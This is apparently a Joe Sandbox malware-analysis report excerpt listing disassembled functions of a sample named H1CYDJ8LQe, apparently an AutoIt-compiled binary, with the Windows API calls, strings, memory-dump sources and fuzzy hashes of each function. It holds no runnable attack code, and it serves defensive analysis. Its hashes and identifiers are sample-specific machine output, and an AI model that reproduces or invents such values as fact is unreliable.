                                                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0043392E
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • __wsplitpath.LIBCMT ref: 00433950
                                                            • __wcsicoll.LIBCMT ref: 00433974
                                                            • __wcsicoll.LIBCMT ref: 0043398A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                            • String ID:
                                                            • API String ID: 1187119602-0
                                                            • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                            • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                            • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                            • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                            • String ID:
                                                            • API String ID: 1597257046-0
                                                            • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                            • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                            • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                            • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                            • __malloc_crt.LIBCMT ref: 0041F5B6
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                            • String ID:
                                                            • API String ID: 237123855-0
                                                            • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                            • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                            • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                            • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyObject$IconWindow
                                                            • String ID:
                                                            • API String ID: 3349847261-0
                                                            • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                            • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                            • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                            • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                            • String ID:
                                                            • API String ID: 2223660684-0
                                                            • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                            • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                            • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                            • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                            • LineTo.GDI32(?,?,?), ref: 00447326
                                                            • EndPath.GDI32(?), ref: 00447336
                                                            • StrokePath.GDI32(?), ref: 00447344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 2783949968-0
                                                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00472B63
                                                            • GetDC.USER32(00000000), ref: 00472B6C
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                            • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                            • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                            • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00472BB2
                                                            • GetDC.USER32(00000000), ref: 00472BBB
                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                            • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                            • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                            • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                            • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                            APIs
                                                            • __getptd_noexit.LIBCMT ref: 00415150
                                                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                            • __freeptd.LIBCMT ref: 0041516B
                                                            • ExitThread.KERNEL32 ref: 00415173
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1454798553-0
                                                            • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                            • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                            • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                            • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _strncmp
                                                            • String ID: Q\E
                                                            • API String ID: 909875538-2189900498
                                                            • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                            • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                            • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                            • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                            APIs
                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 2652923123-3941886329
                                                            • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                            • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                            • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                            • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strncmp
                                                            • String ID: U$\
                                                            • API String ID: 2666721431-100911408
                                                            • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                            • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                            • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                            • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • __wcsnicmp.LIBCMT ref: 00467288
                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                            • String ID: LPT
                                                            • API String ID: 3035604524-1350329615
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \$h
                                                            • API String ID: 4104443479-677774858
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID: &
                                                            • API String ID: 2931989736-1010288
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00466825
                                                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                            Strings
                                                            Similarity
                                                            • API ID: CrackInternet_wcslen
                                                            • String ID: |
                                                            • API String ID: 596671847-2343686810
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                            Strings
